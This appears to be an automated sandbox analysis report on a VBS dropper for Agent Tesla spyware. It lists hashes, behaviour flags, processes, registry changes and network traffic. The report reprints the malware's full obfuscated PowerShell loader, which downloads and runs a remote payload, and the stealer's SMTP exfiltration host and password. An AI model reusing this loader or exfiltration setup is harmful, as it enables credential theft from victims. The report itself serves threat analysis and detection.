File name:

6b3541fd675b6b9b1ab2450e632e54e8b950975a807e74f0e1e0d87563c9aca7.vbs

Full analysis: https://app.any.run/tasks/7dada979-0903-4dc6-b784-2f51e4a1c855
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Malware Trends Tracker     >>>
Analysis date: March 19, 2024, 09:00:57
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
stealer
agenttesla
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (335), with CRLF line terminators
MD5:

807AB2044EB4C9BE0AAE827CEF21DBE9

SHA1:

AFE94F9DFDC9D6CDAD94EBB8C6FEC4DD17FF2EC2

SHA256:

6B3541FD675B6B9B1AB2450E632E54E8B950975A807E74F0E1E0D87563C9ACA7

SSDEEP:

192:nLB+BSKoP0h+G4cszTHlyNWioYJ+dXhnlbp/Iu5YQioN1ytucyoS6AK2mFAt:kSwh+oszTHvYAZBSQJ4rS6BM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Steals credentials from Web Browsers

      • wab.exe (PID: 3352)

    • Actions looks like stealing of personal data

      • wab.exe (PID: 3352)

    • Scans artifacts that could help determine the target

      • wab.exe (PID: 3352)

    • AGENTTESLA has been detected (YARA)

      • wab.exe (PID: 3352)

    • Connects to the CnC server

      • wab.exe (PID: 3352)

    • AGENTTESLA has been detected (SURICATA)

      • wab.exe (PID: 3352)

  • SUSPICIOUS

    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 2496)

    • Suspicious use of asymmetric encryption in PowerShell

      • wscript.exe (PID: 2496)
      • powershell.exe (PID: 4076)

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 2496)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 2496)
      • powershell.exe (PID: 4076)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2496)

    • Reads security settings of Internet Explorer

      • wab.exe (PID: 3352)

    • Checks Windows Trust Settings

      • wab.exe (PID: 3352)

    • Connects to SMTP port

      • wab.exe (PID: 3352)

  • INFO

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 2496)
      • powershell.exe (PID: 4076)

    • Reads the computer name

      • wab.exe (PID: 3352)

    • Checks supported languages

      • wab.exe (PID: 3352)

    • Checks proxy server information

      • wab.exe (PID: 3352)
      • slui.exe (PID: 2584)

    • Creates files or folders in the user directory

      • wab.exe (PID: 3352)

    • Reads the machine GUID from the registry

      • wab.exe (PID: 3352)

    • Reads the software policy settings

      • wab.exe (PID: 3352)
      • slui.exe (PID: 2584)

    • Reads Environment values

      • wab.exe (PID: 3352)

    • Reads Microsoft Office registry keys

      • wab.exe (PID: 3352)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AgentTesla

(PID) Process(3352) wab.exe
Protocolsmtp
Hostsmtp.crane-eletronics.com
Port587
Usernamepen@crane-eletronics.com
PasswordpeFyHns8
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
135
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs #AGENTTESLA wab.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
2496"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\6b3541fd675b6b9b1ab2450e632e54e8b950975a807e74f0e1e0d87563c9aca7.vbs"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2584C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
3352"C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\Windows Mail\wab.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
AgentTesla
(PID) Process(3352) wab.exe
Protocolsmtp
Hostsmtp.crane-eletronics.com
Port587
Usernamepen@crane-eletronics.com
PasswordpeFyHns8
4076"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stopover='konsekvente:\Narcomedusan';Set-Content $Stopover 'Recensure';$Eksemplificerings=Test-Path $Stopover;if($Eksemplificerings){exit};function Skamfnrr ($Palmegrens){For($maws=4; $maws -lt $Palmegrens.Length-1; $maws+=5){$Ths=$Ths+$Palmegrens.'Substring'($maws, 1)};$Ths;}$Konsultationstiders=Skamfnrr 'NonehTr.mt HantR.dup,uxusPer,:Jdek/Fabr/ ined eer,lexiBiclvLocueAf,r.Bakigun eoUnexo Samg GyrlmegaeUnso.Ud oc Whio VrdmAnco/The,uA,juc Dy,? ad.e Si,xtus pRoyaoBrisrMosctUn.p=ArordUnbeoMelew Plun RvelOptaoSticaPoledMori&Su eiSupid ab=Ble,1RetvEJo,i0ba,lz.hervMotoCMitoE,ileOMi,sdUrduYThymBGunnuKrsldEr.ru SelA.pitLSpilQC,loPForkUNitrcChriADemoT dpojAfpaQ FerZSchiNArchrDealBImprERefuPMediJ AutL QuaiSkab ';$transl=Skamfnrr ' DobiAmpheA atxStop ';$Multivariate = Skamfnrr 'Skil\VindsHmoryJvnhsdesiw Sy oNortwTaas6Du,e4Unc,\SpygWO,kli planW.aldEquaoP lewSpirsS.viPcasooHymnw S,ueAuslr So,SRverhLsble Blal pplTvan\ Fisv Exo1harm.,olo0Over\bounp AlloAbsiw SnueT asrTalisU.prhMoneeDisblStralFing. U.deBrstxA.steTran ';&($transl) (Skamfnrr ' ,ni$C.eiRTh re ortSi ooWooluAlarrEste=Ant.$Tro e omnnHrenvU.ex:Fo tw Pari Skyn eed,riniByger N,u ') ;&($transl) (Skamfnrr 'Disc$D scMDiosuSce lUnsotDepoiFlemv,ripaS adrSeseiC mpaGenntLge.eDiff=Sjkl$RessRNonreReintHymeo vuuPeoprOver+udda$AflsM satuBl tlKollt viimu tvBabyaP,elrK,ebiOlisa Ud t ,aleLing ') ;&($transl) (Skamfnrr ' Sid$V,ktSPj,tt krb BezeMistr,adea TronMakad Ade1Tyde4Sema8Spnd .egn=Tyve Ov.r( upe(Unsig conwNoncmUltriFilo DroswUnp.ialkan bru3Blac2 Aka_ForgpBe krBinnoMam,cDikteChlosRegisA,to s,i-.eseF Ung OverP,onirColloAugmcStaieSinns insudhuI VovdUnqu=Sell$ San{TrveP E sI SynDHair}Cave)publ.LisaC edioopermslynm LiaaLuftnUddadSemiLHandiD,senRelaeIn.o)Epi. Flo-Inkos Fldp,hrilStaniCom,t,ona ,mal[,fstcPro.h M.ta.nsur Kom]Hold3Suba4Afg. ');&($transl) (Skamfnrr 'Haru$ItalU DomhSpe,oUnasm HypoFi.tgho.tePo.tn dolienertFunneDisstSpareMycorUnspn Bo.eres sTi.e Afre=Co o T.ve$Wi hSvampt Cr.bGl weOverrParaaSlatnO erdMatr1Han 4 Blo8Uhyg[Ufor$ utS rect,ndvbSinie,acerN dsaAlamn DobdM,tr1 Idi4anke8fals.Ce.ecA teoLoriu,posnEmsitHarm- Blr2Sock]Ansv ');&($transl) (Skamfnrr ' Co $T.sts Chal TaioSamuwSkrimUnmaoDe.ltvan.iElfeoevitnProd=Kond(KaraTLi,heBelasopspt.nde-CognPHalvaVaritForfh,hri Zygo$CalmM ConuSkumlStrmtS amiBrokv SphaAnstrkr.li An.a.nfitStateVulg).all M no-AktiAUhf,nLabydStei Tet(Nyan[M.laIBockn mentGalvPLym,t FyrrAlba],etr:Band: RigsKasti M azU,obeAmus Ho u- gr.e AtoqVo.e Rent8He b) ,it ') ;if ($slowmotion) {&$Multivariate $Uhomogeniteternes;} else {;$Elkrafts=Skamfnrr 'UnhaSBetotSinua NonrlabotOffi- ParBAssoi .uit.idesKrneTA,tirScuraVenenBrefssmalfRakleTurbrKniv Sko-flyvSInteou,diuoverr Ti cTi.fe Pia oro$PizzKFtreoMo,onCispsM kiu NonlTvint ConaHi ttSt,viBerbo,rskn Fd sUdgit TiliGenndSisaemoserSk ms re bnke-a,ekDKllie SuasO.ertFrigiHanknseveaUnq.tFlapiResuoViatnUre Vene$Z,loRFraaeDenatStroo Friu slarS,aa ';&($transl) (Skamfnrr 'I ds$ErfaRSp,ceElectBoxho SteuMrkarNeur=Quad$SaxeeDitenJgervtelu:BemaaMorpp SampFragdCramaSolatBetea,iss ') ;&($transl) (Skamfnrr 'SkriITe rmMoanp KokoditmrForsta,te-SavlMRejsoNon dKi ouTrillTeleeEksi gudBBarsi RevtAfhssAft TAn kr olaHomonBifls UnafKne e fu rPreo ') ;$Retour=$Retour+'\Eucarpic.joy';while (-not $ingebeth) {&($transl) (Skamfnrr 'Rhyt$Frati.regnWracgForteR.bbb MeseArbet Redhsmal=Fle ( AfvTOvereUnplsBusst sy - ndlP Gr aAdmit TuthS ir .rs$ NonRUds eHarbtBrono,dliu M drAzoc)Carr ') ;&($transl) $Elkrafts;&($transl) (Skamfnrr 'PapnSPe.stGrataCondr Libt,uft-SchoSsognlTraceSp,reSnu.p Spe .dbl5P.co ');}&($transl) (Skamfnrr 'Pret$TudsFGeleo.uttlVarmkBrimeTontmTu.eiTheln ArydEmiteAmalfforloB,sirReolsCom,k StoeRecorklim mbr=Usik StriGG ngePia.tSkra-AnemC papo In nC,rtt S reAn.ans,ontD.fe Pill$MuscRFangeUnfutMeanoPestu errrFa.a ');&($transl) (Skamfnrr '.ati$TheoK AktoAndrmLo abd ngi StanBlndaCo.ntSolbiSmi.oNeg.nBe ae I,dnBesp6,ind2Kaar oul=Appr Sona[OmstS TemyVe.ssI.latThioeAr,emBir..Ads CBesvoS,mlnHandvAnaleGuarrH.lit .on]Ef e: .eb:GlimF Unrr nonoPresmClubB.evgaKl.rs Tyle nar6Tran4RntgS Vert SysrKrlii M.jnPapng Gra( wel$D bbF.assoOloml HuskNonde JuimBlu.iSapinAvo.dTotiekafff n roFo rr DiasDannk,roce lcrUnv,)Guri ');&($transl) (Skamfnrr 'B.od$.uldCGlitoR,selRes lMayhuregnt,ottocaserIllui ShieWhinsUnde Leva=Nonp Odre[g.olS oncy Vo.sBen tGenke PremP,eu. pilTTeleeD.lkxnonvtBa,l.dr aEGe.enSexocLarrom.didDingibre,nNoneg Tox]Fysi:.yss:handAAd.eSBirtC V,nI GenIA.ag.HowlGTo.ee KoktInv.SFrogt.nderEngaiSyc.nBeshgU,tr(B rh$Co,kKRet,opowdmMis,bOu siKo.sn K naJow tTinsiK,glo aoinForbeTripnDikt6 Tra2 fro)Gel, ');&($transl) (Skamfnrr ' .id$,riaK tolngensaEtikpFootnNonsi legnInkbgAftaeOve,nOp e=Pse.$ DatCSissoHistlA.kalIncau Natt HanoHjlprGaariB sweScats Hng.Ra,esL.ngudotabBlgesBristPapyrTelei PrenSkrig Flg(,klm3Kult2Nomo3Vold2 Bid6 Gay8Foru,Nonr3Rosm7Ani,1P,nw7Ford4wlon)N.ur ');&($transl) $Knapningen;}"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
4968"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stopover='konsekvente:\Narcomedusan';Set-Content $Stopover 'Recensure';$Eksemplificerings=Test-Path $Stopover;if($Eksemplificerings){exit};function Skamfnrr ($Palmegrens){For($maws=4; $maws -lt $Palmegrens.Length-1; $maws+=5){$Ths=$Ths+$Palmegrens.'Substring'($maws, 1)};$Ths;}$Konsultationstiders=Skamfnrr 'NonehTr.mt HantR.dup,uxusPer,:Jdek/Fabr/ ined eer,lexiBiclvLocueAf,r.Bakigun eoUnexo Samg GyrlmegaeUnso.Ud oc Whio VrdmAnco/The,uA,juc Dy,? ad.e Si,xtus pRoyaoBrisrMosctUn.p=ArordUnbeoMelew Plun RvelOptaoSticaPoledMori&Su eiSupid ab=Ble,1RetvEJo,i0ba,lz.hervMotoCMitoE,ileOMi,sdUrduYThymBGunnuKrsldEr.ru SelA.pitLSpilQC,loPForkUNitrcChriADemoT dpojAfpaQ FerZSchiNArchrDealBImprERefuPMediJ AutL QuaiSkab ';$transl=Skamfnrr ' DobiAmpheA atxStop ';$Multivariate = Skamfnrr 'Skil\VindsHmoryJvnhsdesiw Sy oNortwTaas6Du,e4Unc,\SpygWO,kli planW.aldEquaoP lewSpirsS.viPcasooHymnw S,ueAuslr So,SRverhLsble Blal pplTvan\ Fisv Exo1harm.,olo0Over\bounp AlloAbsiw SnueT asrTalisU.prhMoneeDisblStralFing. U.deBrstxA.steTran ';&($transl) (Skamfnrr ' ,ni$C.eiRTh re ortSi ooWooluAlarrEste=Ant.$Tro e omnnHrenvU.ex:Fo tw Pari Skyn eed,riniByger N,u ') ;&($transl) (Skamfnrr 'Disc$D scMDiosuSce lUnsotDepoiFlemv,ripaS adrSeseiC mpaGenntLge.eDiff=Sjkl$RessRNonreReintHymeo vuuPeoprOver+udda$AflsM satuBl tlKollt viimu tvBabyaP,elrK,ebiOlisa Ud t ,aleLing ') ;&($transl) (Skamfnrr ' Sid$V,ktSPj,tt krb BezeMistr,adea TronMakad Ade1Tyde4Sema8Spnd .egn=Tyve Ov.r( upe(Unsig conwNoncmUltriFilo DroswUnp.ialkan bru3Blac2 Aka_ForgpBe krBinnoMam,cDikteChlosRegisA,to s,i-.eseF Ung OverP,onirColloAugmcStaieSinns insudhuI VovdUnqu=Sell$ San{TrveP E sI SynDHair}Cave)publ.LisaC edioopermslynm LiaaLuftnUddadSemiLHandiD,senRelaeIn.o)Epi. Flo-Inkos Fldp,hrilStaniCom,t,ona ,mal[,fstcPro.h M.ta.nsur Kom]Hold3Suba4Afg. ');&($transl) (Skamfnrr 'Haru$ItalU DomhSpe,oUnasm HypoFi.tgho.tePo.tn dolienertFunneDisstSpareMycorUnspn Bo.eres sTi.e Afre=Co o T.ve$Wi hSvampt Cr.bGl weOverrParaaSlatnO erdMatr1Han 4 Blo8Uhyg[Ufor$ utS rect,ndvbSinie,acerN dsaAlamn DobdM,tr1 Idi4anke8fals.Ce.ecA teoLoriu,posnEmsitHarm- Blr2Sock]Ansv ');&($transl) (Skamfnrr ' Co $T.sts Chal TaioSamuwSkrimUnmaoDe.ltvan.iElfeoevitnProd=Kond(KaraTLi,heBelasopspt.nde-CognPHalvaVaritForfh,hri Zygo$CalmM ConuSkumlStrmtS amiBrokv SphaAnstrkr.li An.a.nfitStateVulg).all M no-AktiAUhf,nLabydStei Tet(Nyan[M.laIBockn mentGalvPLym,t FyrrAlba],etr:Band: RigsKasti M azU,obeAmus Ho u- gr.e AtoqVo.e Rent8He b) ,it ') ;if ($slowmotion) {&$Multivariate $Uhomogeniteternes;} else {;$Elkrafts=Skamfnrr 'UnhaSBetotSinua NonrlabotOffi- ParBAssoi .uit.idesKrneTA,tirScuraVenenBrefssmalfRakleTurbrKniv Sko-flyvSInteou,diuoverr Ti cTi.fe Pia oro$PizzKFtreoMo,onCispsM kiu NonlTvint ConaHi ttSt,viBerbo,rskn Fd sUdgit TiliGenndSisaemoserSk ms re bnke-a,ekDKllie SuasO.ertFrigiHanknseveaUnq.tFlapiResuoViatnUre Vene$Z,loRFraaeDenatStroo Friu slarS,aa ';&($transl) (Skamfnrr 'I ds$ErfaRSp,ceElectBoxho SteuMrkarNeur=Quad$SaxeeDitenJgervtelu:BemaaMorpp SampFragdCramaSolatBetea,iss ') ;&($transl) (Skamfnrr 'SkriITe rmMoanp KokoditmrForsta,te-SavlMRejsoNon dKi ouTrillTeleeEksi gudBBarsi RevtAfhssAft TAn kr olaHomonBifls UnafKne e fu rPreo ') ;$Retour=$Retour+'\Eucarpic.joy';while (-not $ingebeth) {&($transl) (Skamfnrr 'Rhyt$Frati.regnWracgForteR.bbb MeseArbet Redhsmal=Fle ( AfvTOvereUnplsBusst sy - ndlP Gr aAdmit TuthS ir .rs$ NonRUds eHarbtBrono,dliu M drAzoc)Carr ') ;&($transl) $Elkrafts;&($transl) (Skamfnrr 'PapnSPe.stGrataCondr Libt,uft-SchoSsognlTraceSp,reSnu.p Spe .dbl5P.co ');}&($transl) (Skamfnrr 'Pret$TudsFGeleo.uttlVarmkBrimeTontmTu.eiTheln ArydEmiteAmalfforloB,sirReolsCom,k StoeRecorklim mbr=Usik StriGG ngePia.tSkra-AnemC papo In nC,rtt S reAn.ans,ontD.fe Pill$MuscRFangeUnfutMeanoPestu errrFa.a ');&($transl) (Skamfnrr '.ati$TheoK AktoAndrmLo abd ngi StanBlndaCo.ntSolbiSmi.oNeg.nBe ae I,dnBesp6,ind2Kaar oul=Appr Sona[OmstS TemyVe.ssI.latThioeAr,emBir..Ads CBesvoS,mlnHandvAnaleGuarrH.lit .on]Ef e: .eb:GlimF Unrr nonoPresmClubB.evgaKl.rs Tyle nar6Tran4RntgS Vert SysrKrlii M.jnPapng Gra( wel$D bbF.assoOloml HuskNonde JuimBlu.iSapinAvo.dTotiekafff n roFo rr DiasDannk,roce lcrUnv,)Guri ');&($transl) (Skamfnrr 'B.od$.uldCGlitoR,selRes lMayhuregnt,ottocaserIllui ShieWhinsUnde Leva=Nonp Odre[g.olS oncy Vo.sBen tGenke PremP,eu. pilTTeleeD.lkxnonvtBa,l.dr aEGe.enSexocLarrom.didDingibre,nNoneg Tox]Fysi:.yss:handAAd.eSBirtC V,nI GenIA.ag.HowlGTo.ee KoktInv.SFrogt.nderEngaiSyc.nBeshgU,tr(B rh$Co,kKRet,opowdmMis,bOu siKo.sn K naJow tTinsiK,glo aoinForbeTripnDikt6 Tra2 fro)Gel, ');&($transl) (Skamfnrr ' .id$,riaK tolngensaEtikpFootnNonsi legnInkbgAftaeOve,nOp e=Pse.$ DatCSissoHistlA.kalIncau Natt HanoHjlprGaariB sweScats Hng.Ra,esL.ngudotabBlgesBristPapyrTelei PrenSkrig Flg(,klm3Kult2Nomo3Vold2 Bid6 Gay8Foru,Nonr3Rosm7Ani,1P,nw7Ford4wlon)N.ur ');&($transl) $Knapningen;}"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
6308\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
14 495
Read events
14 471
Write events
24
Delete events
0

Modification events

(PID) Process:(2496) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2496) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2496) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2496) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(4968) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(4968) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(4968) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(4968) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(3352) wab.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3352) wab.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
Executable files
0
Suspicious files
4
Text files
5
Unknown types
6

Dropped files

PID
Process
Filename
Type
4076powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dz2akq1x.3ov.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4968powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:C76555487F3760099709FD7487BFB259
SHA256:AD8BEE1720C0631AAD060FC8CDC56D9B6AB83541731C816EA3D0AA2D073CE861
4968powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lvz002jq.cws.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4076powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rhfexjqm.4kt.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4968powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2ybgm05j.yqa.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3352wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAbinary
MD5:DBA737766CAA750561A7D1EF422724CB
SHA256:5709B340759D61E0BE8D4258B9BA874F6DE6E02E9519E6BB5FF32CEF2F4B5D16
3352wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBAbinary
MD5:AC89A852C2AAA3D389B2D2DD312AD367
SHA256:0B720E19270C672F9B6E0EC40B468AC49376807DE08A814573FE038779534F45
3352wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_2517452929F0CAF6449847D40B7C277Dbinary
MD5:07D62BA8CD29FBF8A6F1E4201594CE29
SHA256:24398D01735E1A2C5AEC70AB2CC64D5DC8C87D495EBFC055524BC237DEE32834
3352wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_2517452929F0CAF6449847D40B7C277Dbinary
MD5:DC3BCD2BC8D3E814D4768E6FD184899B
SHA256:CCDBB4D96F100596B3FCBACF8866C86180033D2C94FC0BCB76298E01CB0797A1
4076powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:D67654703E5D515BF5D23C13C334E627
SHA256:60A3D186FC02C9AB124B9DA470598A598F4B846929A0FF24B9945714CBEAE17E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
34
DNS requests
15
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3996
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
binary
471 b
unknown
1260
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D
unknown
313 b
unknown
3732
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
binary
409 b
unknown
3352
wab.exe
GET
200
172.217.16.131:80
http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D
unknown
binary
1.41 Kb
unknown
4800
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D
unknown
binary
471 b
unknown
3352
wab.exe
GET
200
172.217.16.131:80
http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D
unknown
binary
724 b
unknown
3352
wab.exe
GET
200
172.217.16.131:80
http://ocsp.pki.goog/gts1c3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEQCRd4hKrA6aBAnnS3UYBsso
unknown
binary
472 b
unknown
3352
wab.exe
GET
200
172.217.16.131:80
http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCECzpBwEAqmZNCdn%2B9lFcFjc%3D
unknown
471 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
239.255.255.250:1900
unknown
6140
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3996
svchost.exe
20.190.159.73:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1280
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3996
svchost.exe
192.229.221.95:80
